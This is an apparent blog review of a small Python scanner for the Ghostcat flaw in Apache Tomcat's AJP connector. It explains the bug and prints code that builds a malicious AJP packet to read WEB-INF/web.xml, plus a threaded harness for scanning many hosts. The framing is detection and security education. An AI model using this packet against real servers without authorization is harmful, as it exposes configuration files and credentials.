Building a Ghostcat Vulnerability Scanner: Inside CNVD-2020-10487 Detection

Hook

In February 2020, researchers disclosed a 13-year-old bug in Apache Tomcat that let attackers read files from deployed web applications, including configuration files with database credentials, through a protocol connector that most administrators didn't even know was exposed.

Context

CNVD-2020-10487, better known as Ghostcat or CVE-2020-1938, is one of those vulnerabilities that make you question everything you thought you knew about your infrastructure. It affects the Apache JServ Protocol (AJP) connector in Apache Tomcat, a component that has shipped enabled by default since version 6.x. AJP was designed to let web servers like Apache httpd communicate with Tomcat application servers, improving performance through persistent connections and a compact binary format.

The problem? AJP connectors listened on port 8009 by default, often without authentication, and a flaw in request attribute handling allowed attackers to include arbitrary attributes in AJP requests. By manipulating these attributes, specifically javax.servlet.include.request_uri, javax.servlet.include.path_info, and javax.servlet.include.servlet_path, an attacker could trick Tomcat into serving arbitrary files from the web application root. Even worse, in configurations that allowed file uploads, this could escalate to remote code execution. The vulnerability affected Tomcat 6.x through 9.x until fixes shipped in 7.0.100, 8.5.51, and 9.0.31, meaning millions of servers were potentially exposed. This created an immediate need for simple, effective scanning tools to identify vulnerable instances across infrastructure, which is exactly the gap that CNVD-2020-10487_scanner attempts to fill.

Technical Insight

The scanner implements a straightforward but effective approach to Ghostcat detection: multithreaded scanning with file-based I/O for targets and results. At its core, the tool reads target hosts from url.txt, spawns multiple threads to test each target concurrently, and writes vulnerable hosts to vul.txt. This architecture prioritizes speed and simplicity over configurability.
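The file-in, file-out flow described above can be sketched as follows. This is a minimal illustration, not the repository's code: `run_scan` and its `check` callback are hypothetical names, and the sketch runs sequentially to keep the I/O shape visible.

```python
from pathlib import Path

def run_scan(check, input_path="url.txt", output_path="vul.txt"):
    """Read targets, test each with check(target), and write the hits to a file."""
    lines = Path(input_path).read_text(encoding="utf-8").splitlines()
    targets = [line.strip() for line in lines if line.strip()]  # skip blank lines
    vulnerable = [target for target in targets if check(target)]
    # One vulnerable host per line, mirroring the vul.txt convention
    Path(output_path).write_text(
        "".join(f"{target}\n" for target in vulnerable), encoding="utf-8"
    )
    return vulnerable
```

Passing the probe in as a callback keeps the file handling testable without any network access.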

The vulnerability detection itself relies on crafting malicious AJP protocol packets. The AJP13 protocol uses a binary format where requests begin with a magic number (0x1234) followed by packet length and type codes. A typical Ghostcat exploit constructs an AJP ForwardRequest packet with manipulated attributes. Here's what a simplified detection payload structure looks like:

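import struct

def build_ajp_forward_request(host='127.0.0.1', port=8009):
    # Exploit attributes to read WEB-INF/web.xml
    attributes = {
        'javax.servlet.include.request_uri': '/',
        'javax.servlet.include.path_info': '/WEB-INF/web.xml',
        'javax.servlet.include.servlet_path': '/'
    }

    # Build the body first so the length field can be computed from it
    body = b'\x02'                        # Prefix code: Forward Request
    body += b'\x02'                       # HTTP method code: GET
    body += build_ajp_string('HTTP/1.1')  # Protocol
    body += build_ajp_string('/asdf')     # Placeholder URI; the attributes pick the file
    body += build_ajp_string(host)        # remote_addr (simplified: reuses host)
    body += build_ajp_string(host)        # remote_host
    body += build_ajp_string(host)        # server_name
    body += struct.pack('>H', port)       # server_port
    body += b'\x00'                       # is_ssl: false
    body += struct.pack('>H', 0)          # num_headers: none in this sketch
    for name, value in attributes.items():
        # 0x0A marks a generic req_attribute (name/value string pair)
        body += b'\x0a' + build_ajp_string(name) + build_ajp_string(value)
    body += b'\xff'                       # Request terminator

    # AJP13 header: magic number 0x1234, then the body length
    return b'\x12\x34' + struct.pack('>H', len(body)) + body

def build_ajp_string(s):
    # AJP strings are length-prefixed (big-endian) and NUL-terminated
    encoded = s.encode('utf-8')
    return struct.pack('>H', len(encoded)) + encoded + b'\x00'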

The scanner establishes a TCP socket connection to the target on port 8009, sends the crafted AJP packet, and analyzes the response. A vulnerable server will return the contents of WEB-INF/web.xml or another sensitive file. A patched server rejects requests that carry unrecognized attributes, or never answers at all, since fixed releases no longer expose the connector by default. The key is looking for HTTP 200 responses with actual file content rather than error pages.
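To make the "200 with real file content" check concrete, here is a minimal sketch of parsing the raw bytes a Tomcat AJP connector sends back. It assumes the standard AJP13 response framing (`AB` magic, two-byte length, then a one-byte message type); `parse_ajp_response` and `looks_vulnerable` are hypothetical helper names, and the `<web-app` marker is just one plausible heuristic for recognizing web.xml.

```python
import struct

# AJP13 container-to-server message types
SEND_BODY_CHUNK, SEND_HEADERS, END_RESPONSE = 3, 4, 5

def parse_ajp_response(data):
    """Return (status_code, body) extracted from raw AJP13 response packets."""
    status, body, offset = None, b"", 0
    while offset + 4 <= len(data):
        magic, length = struct.unpack_from(">2sH", data, offset)
        if magic != b"AB":
            raise ValueError("not an AJP13 response packet")
        payload = data[offset + 4 : offset + 4 + length]
        offset += 4 + length
        if not payload:
            continue
        code = payload[0]
        if code == SEND_HEADERS:
            # The HTTP status code is the first field after the type byte
            (status,) = struct.unpack_from(">H", payload, 1)
        elif code == SEND_BODY_CHUNK:
            (chunk_len,) = struct.unpack_from(">H", payload, 1)
            body += payload[3 : 3 + chunk_len]
        elif code == END_RESPONSE:
            break
    return status, body

def looks_vulnerable(data):
    """Heuristic: HTTP 200 plus content that resembles a deployment descriptor."""
    status, body = parse_ajp_response(data)
    return status == 200 and b"<web-app" in body
```

Matching on content as well as status helps avoid flagging servers that answer 200 with a custom error page.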

The multithreading implementation uses Python's threading module to parallelize scans across multiple targets. The typical pattern involves a queue of targets with worker threads consuming from the queue:

import threading
import queue

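def worker(target_queue, results):
    # Drain the queue; get_nowait() avoids the race between an empty()
    # check and a blocking get() when several workers compete
    while True:
        try:
            target = target_queue.get_nowait()
        except queue.Empty:
            break
        try:
            # check_vulnerability() is the per-target probe, defined elsewhere
            if check_vulnerability(target):
                results.append(target)  # list.append is thread-safe in CPython
        except OSError:
            pass  # A network error means "not confirmed", not a dead worker
        finally:
            target_queue.task_done()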

def scan_targets(targets, thread_count=10):
    target_queue = queue.Queue()
    results = []
    
    for target in targets:
        target_queue.put(target)
    
    threads = []
    for _ in range(thread_count):
        t = threading.Thread(target=worker, args=(target_queue, results))
        t.start()
        threads.append(t)
    
    for t in threads:
        t.join()
    
    return results

This approach provides reasonable performance for scanning hundreds or thousands of targets without the complexity of async I/O frameworks. The thread count acts as a throttle—too few threads and you're not utilizing available network bandwidth, too many and you risk overwhelming your network stack or triggering rate limits on target networks.
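For comparison, the same throttled fan-out can be written with the standard library's `concurrent.futures.ThreadPoolExecutor`, which is a substitute for the hand-rolled queue above rather than what the scanner itself uses. In this sketch `scan_targets_pooled` and the `check` callback are hypothetical names, and `max_workers` plays the role of the thread count.

```python
from concurrent.futures import ThreadPoolExecutor

def _safe_check(check, target):
    """Run one probe; treat network errors as 'not confirmed vulnerable'."""
    try:
        return bool(check(target))
    except OSError:
        return False

def scan_targets_pooled(targets, check, thread_count=10):
    """Return the targets for which check(target) is truthy, in input order."""
    targets = list(targets)
    with ThreadPoolExecutor(max_workers=thread_count) as pool:
        # pool.map preserves input order, so results line up with targets
        flags = list(pool.map(lambda t: _safe_check(check, t), targets))
    return [target for target, hit in zip(targets, flags) if hit]
```

The executor handles thread startup, joining, and result collection, so the only tuning knob left is `thread_count`.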

One interesting aspect of AJP vulnerability scanning is handling targets that don't behave as expected. Some servers run AJP connectors behind firewalls or on non-standard ports, while others might have partial mitigations in place. A robust scanner should implement timeout handling, connection retry logic, and graceful degradation when targets fail to respond. The basic architecture of this scanner provides the foundation but would benefit from error handling enhancements for production use.
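A minimal sketch of timeout and retry handling might look like the following. Everything here is an assumption for illustration: `send_with_retry`, its parameters, and the linear backoff are not taken from the scanner, and the `connect` argument exists only so the function can be exercised without a live target.

```python
import socket
import time

def send_with_retry(host, packet, port=8009, timeout=5.0, retries=2,
                    backoff=0.5, connect=socket.create_connection):
    """Send packet and return the raw reply, or None if every attempt fails."""
    for attempt in range(retries + 1):
        try:
            with connect((host, port), timeout=timeout) as sock:
                sock.sendall(packet)
                received = b""
                try:
                    while True:
                        chunk = sock.recv(4096)
                        if not chunk:
                            break
                        received += chunk
                except socket.timeout:
                    # AJP connections are persistent, so a read timeout
                    # simply ends the capture
                    pass
                return received
        except OSError:
            # Refused, unreachable, or connect timeout: back off, then retry
            if attempt < retries:
                time.sleep(backoff * (attempt + 1))
    return None
```

Returning `None` instead of raising lets a worker thread record the target as unreachable and move on.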

Gotcha

The most significant limitation is the lack of configuration options and error handling. The scanner appears to hardcode critical parameters like thread count, timeout values, and target port (8009). In real-world penetration testing, you need flexibility—scanning targets on custom ports, adjusting timeouts for slow networks, or rate-limiting to avoid detection. The absence of command-line arguments or a configuration file means modifying the source code for basic adjustments.
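As a sketch of what the missing command-line layer could look like, the snippet below exposes the hardcoded values through `argparse`. The flag names and the thread and timeout defaults are assumptions chosen for illustration; only port 8009 and the url.txt and vul.txt file names come from the tool as described.

```python
import argparse

def build_parser():
    """Hypothetical CLI exposing the values the scanner currently hardcodes."""
    parser = argparse.ArgumentParser(
        description="Ghostcat (CVE-2020-1938) scanner options"
    )
    parser.add_argument("-i", "--input", default="url.txt",
                        help="file with one target per line")
    parser.add_argument("-o", "--output", default="vul.txt",
                        help="file that receives vulnerable hosts")
    parser.add_argument("-p", "--port", type=int, default=8009,
                        help="AJP connector port")
    parser.add_argument("-t", "--threads", type=int, default=10,
                        help="number of worker threads")
    parser.add_argument("--timeout", type=float, default=5.0,
                        help="socket timeout in seconds")
    return parser
```

With this in place, something like `build_parser().parse_args(["-p", "8010", "--timeout", "2"])` would override the port and timeout while leaving the other defaults untouched.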

There's also a notable filename discrepancy in the repository: the main script is named CNVD-2020-1048_scanner.py (missing the '7' in 10487). This kind of typo, while minor, suggests the tool was created quickly without thorough review or testing. More concerning is the lack of validation in the scanning logic. What happens when url.txt contains malformed entries? How does the scanner handle network errors, timeouts, or unexpected responses? Production-grade scanning tools include extensive logging, graceful error recovery, and detailed reporting, all of which are conspicuously absent here. The repository's three GitHub stars and minimal documentation reinforce that this is a proof-of-concept rather than a maintained security tool. For educational purposes or quick internal assessments, these limitations are manageable. For professional security work, they're dealbreakers.
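One way to guard against malformed url.txt entries is to normalize each line before it reaches the scanning threads. The sketch below is an assumption about what such validation could look like, not code from the repository; `parse_target` is a hypothetical helper that accepts bare hosts, `host:port` pairs, and full URLs.

```python
from urllib.parse import urlsplit

def parse_target(line, default_port=8009):
    """Return (host, port) for a target line, or None if it is unusable."""
    text = line.strip()
    if not text or text.startswith("#"):
        return None  # blank line or comment
    has_scheme = "://" in text
    try:
        # Prefixing "//" makes urlsplit treat a bare host[:port] as a netloc
        parts = urlsplit(text if has_scheme else "//" + text)
        host, port = parts.hostname, parts.port  # .port raises on bad ports
    except ValueError:
        return None
    if not host or any(ch.isspace() for ch in host):
        return None
    if has_scheme:
        port = None  # a port in an http(s) URL is not the AJP port
    return host, port or default_port
```

Entries that return `None` can be logged and skipped rather than crashing a worker mid-scan.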

Verdict

Use if: You're learning about the Ghostcat vulnerability and want a simple Python reference implementation to understand AJP protocol exploitation, you need a quick throwaway scanner for an internal CTF or lab environment where reliability isn't critical, or you're building a custom scanning toolkit and want a basic template to extend with proper error handling and features.

Skip if: You're conducting professional penetration tests or security assessments where accuracy and reliability matter, you need comprehensive reporting and logging for compliance or documentation purposes, you're scanning production environments where false negatives could leave critical vulnerabilities undetected, or you simply want a maintained tool with community support. In these cases, use Nuclei with CVE-2020-1938 templates or Metasploit's auxiliary scanners instead.

This tool serves as an educational artifact demonstrating vulnerability scanner architecture, but it lacks the polish for serious security work.
